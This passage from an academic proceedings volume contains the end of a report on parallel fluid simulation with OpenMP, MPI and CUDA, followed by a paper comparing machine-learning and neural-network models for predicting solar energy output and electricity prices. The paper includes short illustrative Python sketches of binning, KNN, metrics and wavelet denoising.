1. High time complexity must be handled carefully: each grid cell holds a density and a velocity, and the fluid's movement is determined by simulation steps applied to the density and the velocity. These steps are carried out one after another, which consumes a lot of time, since much of the computation has O(n^2) time complexity.
2. It is hard to update the diffusion of the fluid in a parallel way.
3. The MPI version needs some form of domain decomposition, which takes a long time to debug.
4. It is ambitious to target both distributed memory and GPUs.
Design/Analysis of Algorithms. The hardest part of this project is the communication between different parts of the simulation. We faced data race problems, and incorrect synchronization could also lead to segmentation faults. It is also vital to choose the most efficient data structure for the implementation. The simulation is somewhat complicated: it requires us to understand the physics behind it and how to set the boundaries. We also needed to learn about velocity diffusion, velocity advection, density diffusion, and density advection for the project. We successfully used OpenMP, MPI and CUDA to parallelize the fluid simulation. We discussed the special design of our algorithms case by case in the sections above.
4.2 Timeliness of the Contribution
There are several approaches to incompressible fluid simulation, and many brilliant algorithms have been proposed for this kind of problem:
1. In 2003, Jos Stam [4] proposed an approximate way of doing fluid simulation based on the Navier-Stokes equations. This two-dimensional version, based on real fluid physics, is our baseline and is also used for the correctness check of our implementation.
2. In 2005, Michael Ash [1] extended the two-dimensional implementation to three dimensions, which will be the baseline for us to further speed up the three-dimensional version. This work also motivated us to compare the OpenMP and CUDA implementations.
3. In 2008, Molemaker et al. used Iterated Orthogonal Projection (IOP) to solve the problem and reduced the time complexity from O(n^2) to O(n log n) [3].
4. In 2017, Chu et al. proposed an optimization that uses multigrid with preconditioned conjugate gradient to solve problems with 1024^3 degrees of freedom [2]. We are curious to see how our method compares with theirs, since their implementation mostly focuses on achieving faster convergence on multi-core CPUs, and how it compares with a GPU implementation, or how a GPU compares with a parallel CPU implementation.
With the development of state-of-the-art OpenMP and CUDA technologies, it is the right time for us to explore, understand and, to some extent, answer how much faster we can go with the knowledge we have learnt in CS267 so far. It is also the right time for us to learn about profiling and about the weak and strong scaling of our implementation. Finally, we compare the CUDA version with the OpenMP version to take a deep dive into the computational differences between CPUs and GPUs for this kind of problem.
Acknowledgment.
During our experiments, we noticed that the performance of both our OpenMP implementation and our CUDA implementation varies slightly throughout the day. This happens on both the Cori supercomputer and the Bridges-2 supercomputer. We suspect that this variation is due to the workload of the supercomputer system at the time of the experiments. To mitigate the effect of this uncontrollable factor on our results, we conducted all of our experiments in consecutive runs at around the same time. In addition, each data point in our graphs is an average of three experiment runs. Moreover, since the goal of our experiments is to understand the scaling and relative performance of the different parallelized implementations, we believe a small shift of the absolute measurements in the same direction should have minimal effect on our conclusions.
References
1. Ash, M.: Simulation and visualization of a 3D fluid. Master's thesis, Université d'Orléans, France (2005)
2. Chu, J., Zafar, N.B., Yang, X.: A Schur complement preconditioner for scalable parallel fluid simulation. ACM Trans. Graph. (TOG) 36(4), 1 (2017)
3. Molemaker, J., Cohen, J.M., Patel, S., Noh, J., et al.: Low viscosity flow simulations for animation. In: Symposium on Computer Animation, vol. 2008 (2008)
4. Stam, J.: Real-time fluid dynamics for games. In: Proceedings of the Game Developer Conference, vol. 18, p. 25 (2003)
Predictive Analysis of Solar Energy Production Using Neural Networks
Vinitha Hannah Subburaj1,2(B), Nickolas Gallegos1,2, Anitha Sarah Subburaj1,2, Alexis Sopha1,2, and Joshua MacFie1,2
1 West Texas A&M University, Canyon, TX 79015, USA
[email protected]
2 GNIRE, Lubbock, TX 79416, USA
Abstract. The energy industry is always looking for smart ways of conserving energy and managing the growing demand for consumable and renewable energy. One of the main challenges with modern electric grid systems is to develop specialized models to predict various factors, such as optimal power flow, load generation, fault detection, condition-based maintenance of assets, performance characteristics of assets, and anomalies. The data associated with energy prediction is diverse. Accurate analysis and prediction of such data cannot be done manually and hence needs a powerful computing tool that is capable of reading such diverse data and converting it to a form that can be used for analysis and knowledge discovery. In this research effort, data collected from a local utility company over a period of three years, from 2019 to 2021, were used to perform the analysis. Machine learning and neural network algorithms were used to build the predictive model. Different levels of data abstraction, along with optimization of model parameters, were used to obtain better results. A comparative study of the various algorithms was carried out at the end to determine the model performance.
Keywords: Renewable energy · Energy production · Data analysis and prediction · Neural networks
1 Introduction
Nowadays, renewable energy sources are in high demand, and their effective utilization is becoming increasingly important. Solar energy is a renewable resource for power that is becoming very popular across the globe, and the smart monitoring of power generation and utilization is crucial. The various parameters that control the production of energy and the subsequent effective utilization of energy resources pose many challenges to utility companies; hence, computational solutions that help them turn data into useful information are the need of the hour. Computational models that can effectively predict the utilization of renewable energy resources will be of great importance to the energy industries. In recent years, Artificial Neural Networks (ANN) have been used in the prediction of solar energy with different parameters such as humidity, pressure, temperature, precipitation, surface pressure, etc. Using historical data, ANN models have the capability of forecasting solar power generation. The main contributions and goals of this study are to i) identify the different parameters that are involved when predicting solar energy production, ii) compare the effectiveness of machine learning and deep learning models for predicting solar energy using various metrics, iii) determine which model is able to provide a sufficient level of accuracy for solar energy predictions, iv) develop a uniform framework for solar energy projections that could be applied to similar problems, and v) conduct economic analyses of energy production using local marginal process values that are supplied by local utility companies.
The remainder of this paper is organized as follows: Sect. 2 covers related work and provides background concepts and definitions. Section 3 provides a summary of the data preparation and the techniques used to develop the prediction models. The results are presented and discussed in Sect. 4. Section 5 concludes by summarizing the findings and future research work.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 396–415, 2023. https://doi.org/10.1007/978-3-031-28073-3_29
2 Related Work
Statistical approaches based on artificial intelligence methods for forecasting solar power generally use power measurements and weather predictions of temperature, relative humidity, and solar irradiance at the location of the photovoltaic power system. In order to categorize the local weather type over the next 24 h (as reported by online meteorological services), a self-organized map (SOM) is trained. The current-day and following-day data obtained from the output of the forecasting module are used to calculate the amount of photovoltaic (PV) generation that is currently available. However, the accuracy of this approach is quite low because it can only predict a few levels of power output. To address these issues, the author of [1] suggests a simpler method for forecasting power generation 24 h in advance using a radial basis function network (RBFN). Results from the suggested approach on a real PV power system demonstrate that it can be used to predict the daily power production of PV power systems accurately [1].
To maintain dependable operation and high energy availability, the rapid growth of PV technology and the expanding number and scale of PV power plants necessitate more effective and sophisticated health monitoring systems. Among the many methods, artificial neural networks (ANNs) have demonstrated the ability to perform PV fault classification and detection. The advantages of ANNs are numerous, including quick decision-making, accurate approximation of nonlinear functions, and no restrictions on the independence or normality of the input. As a result, ANNs have been used extensively in various PV domains, such as solar radiation prediction, maximum power point tracking, solar energy system modelling, PV system sizing, and performance prediction of solar collector systems. In [2] the author analyzed the applications of ANNs for PV fault detection and diagnosis.
Nearly all typical PV issues, including both electrical faults (reflected in one-dimensional characteristics, frequently handled by shallow neural networks) and permanent visual abnormalities (reflected in two-dimensional features, commonly handled by deep neural networks), have been detected and diagnosed using artificial neural networks. More than 90% of the reported classifications were successful. A few difficulties were found after thorough use case evaluations. The most frequent are the model's challenging configuration and the lack of a readily accessible open database of PV system failures. The latter is particularly difficult for deep neural networks, since it is crucial for understanding how many PV pictures are at fault [2].
A correct understanding of the availability and fluctuation of solar radiation intensity in terms of time and domain is crucial for the proper, economical, and efficient production and exploitation of solar energy. The author in [3] analyzed neural networks used to forecast global solar radiation (GSR) on horizontal surfaces for Abha, a city in western Saudi Arabia, using the air temperature, day of the year, and relative humidity as inputs. To evaluate the effectiveness of the ANN system, data from 240 days in 2002 were used. The GSR was predicted using solely measured values of temperature and relative humidity. The results demonstrate that neural networks are capable of estimating GSR from temperature and relative humidity [3].
With the growth of photovoltaic energy, a number of tools and strategies have been proposed in the literature to make use of AI algorithms for solar energy forecasting. A strategy for forecasting solar energy based on deep learning and machine learning methods is presented in [4]. In order to achieve optimal management and security (while applying a comprehensive solution based on a single tool and an acceptable predictive model), the relevance of a few models was assessed for real-time and short-term solar energy forecasting. The data used in this analysis cover the years 2016 through 2018 and relate to Errachidia, a semiarid climatic region in Morocco. The most pertinent meteorological inputs for the models were determined using the Pearson correlation coefficient.
The findings led the authors to conclude that the ANN, which demonstrated good accuracy and low errors, is a straightforward and reliable model that is able to reduce learning errors and is appropriate for real-time and short-term solar energy prediction; the technique also appears promising for long-term solar energy forecasting [4]. To forecast the solar energy production of photovoltaic generators, the research in [5] proposes an ANN. The intermittent nature of solar power raises two primary problems. First, power output and demand must be balanced to ensure management of the entire system; however, the inherent unpredictability of clean energy makes this challenging. Second, energy-producing businesses need a very precise estimate of the energy that will be sold in the power pool, either day-ahead or intraday. The research enables forecasting of future power output in order to optimize grid control, since the tool, developed with the aid of MATLAB® software, can predict the variables involved in solar energy production. Thanks to their internet connectivity, microgrids are able to gather weather forecasts issued by meteorological organizations and use this information together with the developed tool to anticipate the future energy generated by PV producers. Microgrid controllers can therefore act on the outcomes of the ANN. As a result, the developed tool increases the effectiveness and dependability of microgrid control, since the backup systems are activated only when they are actually required [5]. The research study in [6] reviews several solar energy modelling approaches, categorized according to the nature of each approach. The review considers linear, nonlinear, and artificial intelligence models for predicting solar energy. According to the review’s findings, the sunlight ratio, air temperature, and relative humidity have
Predictive Analysis of Solar Energy Production
the strongest relationships with solar energy. Solar radiation data describe how much of the sun’s energy is incident on a surface at a given location on earth at a given time. Because measuring solar radiation is expensive and complex, and because these data are not easily accessible, alternative methods of producing them are required. The review thus identifies the sunlight ratio, ambient temperature, and relative humidity as the inputs most strongly correlated with solar energy. Additionally, compared with linear and nonlinear models, ANN models provide the most accurate means of estimating solar energy [6]. Global solar energy forecasts are simple to compute when the weather is clear or sunny. The research in [7] therefore examines Artificial Neural Network (ANN) models for global solar energy forecasting under various sky conditions, including clear, hazy, partially cloudy, and fully overcast conditions. The study also applied meteorological parameters across various climate zones, namely composite, warm and humid, moderate, hot and dry, and cold and cloudy. It further investigates how a model for forecasting short-term photovoltaic output in solar energy systems may be implemented. According to the overall analysis, the Radial-Basis-Function-Neural-Network (RBFNN) model yields a noticeable decrease in error compared to other approaches. The model has been applied to a wider variety of cases, and for short-term photovoltaic power forecasting in a composite climatic zone the hazy model performs best, with a Mean Absolute Percentage Error (MAPE) of 0.0019%, followed by the sunny, partly cloudy, and fully cloudy models with MAPEs of 0.024%, 0.054%, and 0.109%, respectively [7].
Numerous studies have been conducted on solar energy in an effort to maximize daytime solar radiation, determine the amount of solar power generated, and improve the effectiveness of solar systems. The work in [8] reviews the data mining techniques used for solar power prediction in the literature and reports that artificial neural networks have been demonstrated to be the most effective method for predicting solar power generation [8]. The cost of operations and maintenance currently has a significant influence on the profitability of managing power modules, so energy market players must forecast solar power over both short and long horizons. In [9], the authors propose a method for forecasting solar power using long short-term memory networks and convolutional neural networks, which are used in the deep learning community for time series data analysis. The authors empirically confirm that the proposed method accurately predicts solar power from roughly estimated weather data obtained from national weather centers and that it operates robustly without sophisticated preprocessing to remove outliers. This is important because weather information may not always be available for the location where PV modules are installed, and sensors are frequently damaged. A dedicated deep neural network was created and trained on time series data gathered from photovoltaic inverters and national meteorological centers to estimate the amount of solar electricity that will be generated the next day. Extensive trials on real-world data sets showed that the proposed deep neural network-based solar power prediction system performed best [9]. A feasibility analysis of the PV system in terms of the local environmental characteristics, including the implementation time and cost, is necessary for PV investment. An
artificial neural network was used to simulate the data from the 1.4 PV system that was installed in Sohar, Oman, for the study in [10]. The study’s contribution is the application of three proposed models (MLP, SOFM, and SVM) to forecast the output of comparable systems at twelve other sites around the country using data on observed solar irradiance and local temperature. According to the sensitivity analysis, solar irradiance has a greater impact on production than ambient temperature. Additionally, a forecast of Duqm’s PV production was made through 2050, and little to no change due to climate change was found between 2020 and 2050. Solar irradiance, ambient temperature, and the system output were monitored and recorded over the course of a complete year. The recorded output was used to train the three techniques. Compared with MLP and SVM, the SOFM exhibits higher accuracy (95.25%) and a lower RMSE (0.2514) [10]. PV power generation is essential to keep the demand for electricity from exceeding supply and to provide clean energy to the intelligent power grid. PV energy is expanding and is increasingly being connected to the intelligent power grid. Because PV generation is intermittent, weather dependent, and dispersed across the grid, forecasting is essential to the integration of PV generators into the smart power grid. In [11], a thorough analysis of the performance of PV forecasting techniques was conducted. The research examines the relevance of PV generation forecasts in a smart power grid as well as a wide range of associated challenges at both the centralized and distributed levels. Forecasting improves the scheduling of loads and the trade between power system operators. A variety of forecasting methods and models were examined in that work.
It was found that the model’s forecasting performance depends on the forecasting horizon, the data at hand, and the method used to make the prediction. Additionally, the model’s accuracy rises when input and output are strongly correlated, and it improves as more input variables are included in the forecasting process [11]. Accurate and reliable PV power forecasts are needed to create predictive control algorithms for effective energy management and monitoring of residential grid-connected solar systems. In [12], a PV yield prediction system is presented that combines an irradiance forecast model with a PV model: the PV model converts the irradiance forecast into a forecast of PV power. The proposed irradiance forecast model is built on multiple feed-forward neural networks. PV power forecasts based on the neural network irradiance forecast performed substantially better than the PV power persistence prediction model. According to the sensitivity analysis of the multiple feed-forward neural network GHI forecast model, solar angles (azimuth angle and zenith angle) and extraterrestrial irradiance are, in addition to meteorological factors, potential predictors for the global horizontal irradiance (GHI). The analysis also suggests that the GHI neural network forecast model is more sensitive to temperature, cloudiness, and sunlight than to other inputs [12]. The authors in [13] estimated solar irradiance using an artificial neural network trained with the backpropagation method. The model is trained on relevant data, including solar irradiance and meteorological data from the preceding seven days. The forecasts project solar irradiance at half-hour intervals for present conditions,
which were not accounted for in the models. According to simulation findings, the mean absolute percentage errors of the forecasts for the four days are less than 6% [13]. Abnormal shading on the surface of solar panels severely harms their effectiveness and lifespan. The study in [14] developed a system for detecting abnormal shading on solar panels. It first finds the shading and then isolates the solar panel; finally, the shading is recognized and classified using an object detection technique. According to experimental data, the system’s abnormal shading classification accuracy is 94.5%, which is 23% higher than that of the prior approach [14]. To integrate intermittent renewable energy sources (RES) into electrical utility networks, it is crucial to forecast solar irradiance for photovoltaic power generation. The study in [15] evaluates two machine learning (ML) techniques for the prediction of intraday solar irradiance: multigene genetic programming (MGGP) and the multilayer perceptron (MLP) artificial neural network (ANN). MGGP is a cutting-edge method that uses an evolutionary algorithm in a white-box setting. To compare these approaches on a wide range of reliable results, Persistence, MGGP, and MLP were used to forecast irradiance at six sites, with horizons from 15 to 120 min. According to the evaluation of exogenous inputs, including extra meteorological variables improves irradiance forecast ability by 3.41% for root mean square error (RMSE) and 5.68% for mean absolute error (MAE). Additionally, the increased accuracy of iterative forecasts in MGGP was confirmed. The results show that the choice of error metric and the location affect which model is the most accurate. The Haurwitz and Ineichen clear sky models were both used, and the findings showed that their impact on the prediction accuracy of multivariate ML forecasting was minimal.
In general, MGGP provided faster solutions for single prediction scenarios and more accurate and reliable outcomes than ANN did for ensemble forecasting, despite the latter’s increased complexity and need for more computing work [15].
3 Research Methodology
3.1 Data Preparation and Preprocessing
3.1.1 The Obstacle of Data Preparation
Extracting the data from files and merging or separating it across the datasets was probably one of the largest obstacles. While Python has convenient, easy-to-use functions and libraries, and a vast amount of information is available on the internet, learning how to use the functions in combination proved challenging at times.
3.1.2 Preprocessing Methods
The data was extracted from CSV files using the “pandas” module. Using parameters and other functions, the inputs (Temperature, Wind Speed, Humidity) were merged together into one variable and the output (System Production) was placed into another. Then different wavelet transforms were applied to the inputs and the output was separated
into classes based on ranges of the system production. Since some areas of the data were noisier than others, different time intervals were tried to make the models perform better. The final training and testing were done on the period from 2018-01-01 to 2019-01-01 because it seemed to yield the best results. The Locational Marginal Price (LMP) data covered the entire year of 2018. The data was split at 2018-11-01: all data before that date was used for training and the remainder for testing.
3.2 Feature Extraction
The aim of the data collected in this research effort was to predict the energy produced given the temperature, wind speed, and humidity. To improve the accuracy of the algorithms, the output was converted from its true value (measured in Wh) to a value that represented a class, or range, of outputs. In this case, 10 classes, each spanning a range of 12000 Wh, seemed to work best. A function that cuts the data into classes automatically was also tried. The function divides classes based on the range between the minimum and maximum values, extended by ten percent on each side. However, manually setting the intervals seemed to work better. Wavelet transforms were also applied to all of the initial data collected in this research effort.
3.3 Machine Learning and Neural Network Algorithms Overview
3.3.1 Decision Tree
The Decision Tree was one of the first models used. It is a simple, nonparametric, supervised learning algorithm that can be used for classification or regression. As its name suggests, the algorithm is built on a tree structure and uses a splitting criterion to decide when to split a decision node into two or more sub-nodes.
3.3.2 Support Vector Machines (SVM)
The SVM is a supervised machine learning algorithm for classification or regression. The algorithm separates the data into classes by finding the lines or hyperplanes that best separate the data.
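The conversion of the output into classes described in Sect. 3.2 can be illustrated with a minimal sketch. The function names are hypothetical, and two details are assumptions because the text does not state them: the manual classes are taken to start at 0 Wh, and the ten-percent padding of the automatic variant is taken as a fraction of the observed range.

```python
def to_class(production_wh, width_wh=12000.0, n_classes=10, start_wh=0.0):
    """Map a production value in Wh to a class index 0..n_classes-1.

    Assumption: classes are contiguous, equally wide, and start at start_wh.
    Values outside the covered range are clipped into the first or last class.
    """
    index = int((production_wh - start_wh) // width_wh)
    return max(0, min(n_classes - 1, index))


def auto_edges(values, n_classes=10, pad=0.10):
    """Equal-width class edges over the observed range, padded on each side.

    Assumption: the padding is a fraction of (max - min).
    Returns n_classes + 1 edges, from the padded minimum to the padded maximum.
    """
    lo, hi = min(values), max(values)
    margin = pad * (hi - lo)
    lo, hi = lo - margin, hi + margin
    step = (hi - lo) / n_classes
    return [lo + i * step for i in range(n_classes + 1)]
```

With these defaults, a production of 35999 Wh falls into class 2 and anything at or above 120000 Wh is clipped into class 9. The automatic variant moves the edges with every change in the observed extremes, which may be one reason fixed, manually chosen intervals behaved better here.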
3.3.3 K-Nearest Neighbors (KNN)
KNN is a non-parametric, supervised learning algorithm that can be used for regression or classification. The algorithm makes a prediction for a given point by finding the “K” training samples closest to it. The point is assigned whichever class the majority of those samples belong to.
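The majority-vote rule described above can be sketched in a few lines of plain Python. This is an illustration only, not the implementation used in the paper: the function names are hypothetical, Euclidean distance is an assumption, and in practice the inputs would usually be scaled so that no single variable dominates the distance.

```python
from collections import Counter
import math


def knn_predict(train_points, train_labels, query, k):
    """Classify `query` by majority vote among its k nearest training points.

    Uses Euclidean distance. If several classes share the top vote count,
    the one that appears first among the nearest neighbours is returned.
    """
    distances = sorted(
        (math.dist(point, query), label)
        for point, label in zip(train_points, train_labels)
    )
    nearest_labels = [label for _, label in distances[:k]]
    return Counter(nearest_labels).most_common(1)[0][0]


def sqrt_rule_k(n_train):
    """Rule-of-thumb starting value for K: about sqrt(training-set size)."""
    return max(1, round(math.sqrt(n_train)))
```

Each training point here would be a (temperature, wind speed, humidity) tuple and each label a class index. The helper `sqrt_rule_k` only gives a starting value; K is normally tuned by testing several values around it.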
3.3.4 Sequential Neural Network
In general, Neural Networks differ from the other models because they are not a “one size fits all” type of model. The user must set up the model for the current set of data, and it will most likely not carry over to other datasets. For this dataset, the following model was built: an input layer with three nodes for the three inputs, followed by five hidden layers with ten, fifty, one hundred, twenty-five, and twenty nodes, in that order. Those layers feed into the final output layer, which had ten nodes for the ten classes with ranges of 12000 Wh. The optimizer used was the Adaptive Moment Estimation (ADAM) optimizer, an extension of the stochastic gradient descent algorithm. The network used Sparse Categorical Cross Entropy to calculate the loss.
3.3.5 Recurrent Neural Networks (RNN)
The following RNNs were used for predicting the LMP data from Southwest Power Pool (SPP).
3.3.5.1 Long-Short Term Memory (LSTM)
The LSTM model was used for its ability to learn order dependence. The structure of the network is just like that of a standard Sequential Neural Network (SNN), but the neuron used is different. An LSTM cell uses an input gate, an output gate, and a forget gate. The structure of these cells allows them to remember information over an arbitrary amount of time and makes them well suited for making predictions on time series data. The optimizer used was Root Mean Square Propagation (RMSProp) and the loss was calculated using Mean Squared Error (MSE).
3.3.5.2 Gated-Recurrent Units (GRU)
The GRU model is very similar to the LSTM model but is faster and uses less memory because it uses only two gates instead of the three that LSTM uses. This makes it faster but can make it less accurate. In general, LSTM is preferred for longer sequences while GRU is better for shorter sequences.
It seemed that the GRU model had a lower RMSE on the data but it was not as accurate during sharp spikes in the data as the LSTM model was. The optimizer used was Stochastic Gradient Descent (SGD) and loss was calculated using MSE.
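The speed and memory difference between the two cell types can be made concrete by counting trainable weights. The sketch below uses the textbook formulation, in which every gate and every candidate state has an input matrix, a recurrent matrix, and one bias vector; library implementations can differ slightly in how they handle biases. The function names and the layer size in the usage note are hypothetical, since the paper does not report the number of units.

```python
def recurrent_weight_count(n_inputs, n_units, n_blocks):
    """Trainable weights in one recurrent layer built from `n_blocks` blocks.

    Each block has an input matrix (n_units x n_inputs), a recurrent matrix
    (n_units x n_units), and one bias vector (n_units).
    """
    per_block = n_units * n_inputs + n_units * n_units + n_units
    return n_blocks * per_block


def lstm_weight_count(n_inputs, n_units):
    # Input, forget, and output gates plus the candidate cell state: 4 blocks.
    return recurrent_weight_count(n_inputs, n_units, 4)


def gru_weight_count(n_inputs, n_units):
    # Update and reset gates plus the candidate hidden state: 3 blocks.
    return recurrent_weight_count(n_inputs, n_units, 3)
```

For a single input feature and an assumed layer of 50 units, this gives 10400 weights for the LSTM layer and 7800 for the GRU layer. Under this formulation the GRU layer always has three quarters of the LSTM layer's weights, which is consistent with its lower training time and memory use.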
4 Analysis of Results
Earlier results obtained by the research team [16] were limited by insufficient data for analysis and by the inability to introduce new models for prediction. These drawbacks were overcome in this research effort.
Fig. 1. LMP data
Figure 1 shows the Locational Marginal Pricing (in US Dollars per Watt-hour) from January 1, 2018 to January 1, 2019. The blue section of the graph was used for training the Long-Short Term Memory Neural Network and the orange section was used for testing.
Fig. 2. Temperature data vs Day
In Fig. 2, the X-axis shows the dates from January 1, 2018 to January 1, 2021 and the Y-axis shows the temperature in degrees Fahrenheit for a given date.
Fig. 3. Wind speed vs Day
In Fig. 3, the X-axis shows the dates from January 1, 2018 to January 1, 2021 and the Y-axis shows the wind speed in miles per hour for a given date.
Fig. 4. Humidity vs Day
In Fig. 4, the X-axis shows the dates from January 1, 2018 to January 1, 2021 and the Y-axis shows the humidity in percent for a given date.
Fig. 5. Energy production vs Day
In Fig. 5, the X-axis shows the dates from January 1, 2018 to January 1, 2021 and the Y-axis shows the site energy production in Watt-hours for a given date.
Fig. 6. Decision tree model
Figure 6 shows the results of the Decision Tree Model on the Test Data. Since the data was split randomly, each position on the X-axis simply corresponds to a randomly selected data value, representing a random time and its inputs in the dataset. The Y-axis shows the range in Watt-Hours that a given data value falls in. The red line is the true value of each point and the blue line shows the predicted value.
Fig. 7. SVM model
Figure 7 shows the results of the SVM Model on the Test Data. Since the data was split randomly, each position on the X-axis simply corresponds to a randomly selected data value, representing a random time and its inputs in the dataset. The Y-axis shows the range in Watt-Hours that a given data value falls in. The red line is the true value of each point and the blue line shows the predicted value.
Fig. 8. KNN model
Figure 8 shows the results of the KNN Model on the Test Data. Since the data was split randomly, each position on the X-axis simply corresponds to a randomly selected data value, representing a random time and its inputs in the dataset. The Y-axis shows the range in Watt-Hours that a given data value falls in. The red line is the true value of each point and the blue line shows the predicted value.
Fig. 9. Sequential neural network
Figure 9 shows the results of the Sequential Neural Network on the Test Data. Since the data was split randomly, each position on the X-axis simply corresponds to a randomly selected data value, representing a random time and its inputs in the dataset. The Y-axis shows the range in Watt-Hours that a given data value falls in. The red line is the true value of each point and the blue line shows the predicted value.
Fig. 10. LSTM model
Figure 10 shows the results of the Long-Short Term Memory (LSTM) Model on the Test Data. Unlike the initial raw real-time data, the Locational Marginal Price (LMP) data was split manually. Therefore, the X-axis represents the data values ordered chronologically from November 1, 2018 to January 1, 2019. The Y-axis represents the LMP (in Dollars/Watt-Hour). The blue lines are the predictions of the LMP while the red lines are the true values.
Fig. 11. GRU model
Figure 11 shows the results of the GRU Model on the Test Data. Unlike the initial raw data, the Locational Marginal Price (LMP) data was split manually. Therefore, the X-axis represents the data values ordered chronologically from November 1, 2018 to January 1, 2019. The Y-axis represents the LMP (in Dollars/Watt-Hour). The blue lines are the predictions of the LMP while the red lines are the true values.
4.1 Wavelet Transforms
In an attempt to denoise the data before use in the various models, several wavelet transforms were tried with various wavelets. In Python, a module called “pywt” allows wavelet transforms to be implemented. Like the Fourier Transform, the Wavelet Transform is typically used in signal processing; it converts time-amplitude information from a signal into time-frequency information. This allows specific frequencies to be retrieved from a signal or, in the case of this research, from the temperature, wind speed, and humidity data. Using this information, a new signal with less noise can be reconstructed. In this effort, wavelet types were chosen informally, based on which graphs appeared to fit the data best. Figures 12, 13, 14, 15, 16, 17 and 18 show the fits of the preferred wavelets.
4.2 Discussion of Results
The Decision Tree Model had 29.7% accuracy on the Test Data with an RMSE of 1.60, which means that it was off, on average, by between one and two classes. However, this model was not expected to perform as well as the others. The SVM Model did somewhat better, reaching 43.2% accuracy with an RMSE of 1.23. The KNN Model was tested with various values of K. It has been observed that values of K around the square root of the size of the training data tend to yield better results. This seemed to hold for this dataset: the best accuracy, 43.2%, was obtained with K = 32, which also produced an RMSE of 0.93.
Accuracy was improved to 54.05% on the Sequential Neural Network. However, RMSE came out to 2.61 on the test data.
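The two metrics reported above measure different things, which a small sketch can make clear. It assumes that the RMSE was computed on class indices, as the "off by a number of classes" reading suggests; the text does not state this explicitly, and the function names are hypothetical.

```python
import math


def accuracy(true_classes, predicted_classes):
    """Fraction of samples whose predicted class equals the true class."""
    hits = sum(t == p for t, p in zip(true_classes, predicted_classes))
    return hits / len(true_classes)


def class_rmse(true_classes, predicted_classes):
    """Root mean squared error measured in class indices."""
    squared = [(t - p) ** 2 for t, p in zip(true_classes, predicted_classes)]
    return math.sqrt(sum(squared) / len(squared))
```

For true classes [3, 4, 5, 6], the predictions [3, 4, 7, 2] are exactly right half of the time (accuracy 0.5) but have an RMSE of about 2.24, whereas [4, 5, 6, 7] are never exactly right (accuracy 0) yet have an RMSE of 1.0. Under the stated assumption, this is one possible explanation for the Sequential Neural Network having both the highest accuracy and the highest RMSE: its misses may have been fewer but further from the true class.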
Fig. 12. Temperature and its denoising using the “rbio2.6” wavelet
Fig. 13. Temperature and its denoising using the “rbio3.7” wavelet.
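The idea behind the wavelet denoising of Sect. 4.1 can be sketched without any external library. The sketch below is not the authors' pipeline: it substitutes the simple Haar wavelet for the “rbio” and “bior” wavelets shown in the figures, uses a single decomposition level, and assumes that noise is suppressed by soft-thresholding the detail coefficients, which is one common approach that the text does not confirm. All function names and the threshold are hypothetical.

```python
import math


def haar_forward(signal):
    """One-level Haar transform of an even-length sequence.

    Returns (approximation, detail) coefficient lists, each half as long.
    """
    s = math.sqrt(2.0)
    approx = [(signal[i] + signal[i + 1]) / s for i in range(0, len(signal), 2)]
    detail = [(signal[i] - signal[i + 1]) / s for i in range(0, len(signal), 2)]
    return approx, detail


def haar_inverse(approx, detail):
    """Rebuild the signal from one level of Haar coefficients."""
    s = math.sqrt(2.0)
    signal = []
    for a, d in zip(approx, detail):
        signal.extend([(a + d) / s, (a - d) / s])
    return signal


def soft_threshold(coefficients, threshold):
    """Shrink coefficients toward zero; those below the threshold become 0."""
    return [math.copysign(max(abs(c) - threshold, 0.0), c) for c in coefficients]


def denoise(signal, threshold):
    """Transform, shrink the detail coefficients, and reconstruct."""
    approx, detail = haar_forward(signal)
    return haar_inverse(approx, soft_threshold(detail, threshold))
```

With a threshold of zero the signal is reconstructed unchanged; with a very large threshold every pair of neighbouring samples is replaced by its mean. Useful thresholds lie in between and, like the choice of wavelet, would need to be judged against plots such as Figs. 12 to 18.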
The errors of the above algorithms were of similar magnitude. The average RMSE of the algorithms is about 1.59 and, based on Figs. 6, 7, 8 and 9, the predicted values typically trend in the same direction as the actual values but are sometimes off by about one or two classes. A possible reason for these issues is the need for better preprocessing, such as removing outliers, trying different
Fig. 14. Temperature and its denoising using the “rbio3.9” wavelet
Fig. 15. Wind Speed and its denoising using the “bior5.5” wavelet.
methods of denoising, finding intervals with more consistent trends, or a combination of these. The algorithms could also be improved by further tuning of the hyper-parameters, such as the K value in the KNN model or the kernel type, degree of the kernel polynomial function, or gamma in the SVM model.
Fig. 16. Humidity and its denoising using the “bior5.5” wavelet.
Fig. 17. Humidity and its denoising using the “rbio2.6” wavelet.
The predictive modeling done on the LMP data was slightly different. The model used the actual LMP output instead of placing the values into classes. This made the RMSE larger relative to the first models. Recurrent Neural Networks (RNN) were used on the LMP data because it was time-series data and RNNs learn by order dependence versus the classification style of the other models. Accuracy was not measured on the
Fig. 18. Humidity and its denoising using the “rbio2.8” wavelet.
Long-Short Term Memory (LSTM) model. Its RMSE was 51.77, and the range of the LMP was approximately 2400. The Gated-Recurrent Unit (GRU) model is much like the LSTM model. The two models typically trade off accuracy against speed and memory usage: GRU is typically preferred for shorter sequences and is quicker and more memory efficient, while LSTM is more accurate but slower and uses more memory. Nevertheless, GRU achieved a slightly better RMSE of 47.55, although it seemed to detect the sharp spikes in the data less often. Like the models used for predicting the solar output, the two recurrent networks faced some of the same possible issues in the preprocessing stage. The structure of the networks also allows for variation in results. The two networks had the same architecture, except that the LSTM nodes were replaced with GRU nodes. One area to explore for these models is different architectures that tend to work for similar datasets. Effort was put into finding structures that would better fit the LMP dataset, but it was found that architectures are largely dataset dependent and require experimentation to find the best one. In this paper, the architecture was kept mostly constant; what was adjusted were the epochs (the number of times the entire dataset was passed forward and backward through the network) and the batch size (the number of data values passed through the network at once). Because training took a long time, the number of epochs had to be kept relatively small, between 1 and 5 inclusive, while the batch size varied from 10 to 200. These choices were initially guided by prior research but were mostly arbitrary and were adjusted as the results improved. For the results mentioned above, the number of epochs was set to five and the batch size to 200 for both models so that they could be compared. Future research will focus on the network architecture.
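Because the LMP models predict raw values rather than classes, their RMSE is easier to interpret relative to the spread of the data. The short sketch below divides the two reported RMSE values by the reported LMP range of approximately 2400. Normalizing by the range is only one of several conventions and is an assumption here, as is the function name.

```python
def normalized_rmse(rmse, value_range):
    """RMSE expressed as a fraction of the observed range of the target."""
    if value_range <= 0:
        raise ValueError("value_range must be positive")
    return rmse / value_range


lstm_nrmse = normalized_rmse(51.77, 2400.0)
gru_nrmse = normalized_rmse(47.55, 2400.0)
print(f"LSTM: {lstm_nrmse:.2%}  GRU: {gru_nrmse:.2%}")  # LSTM: 2.16%  GRU: 1.98%
```

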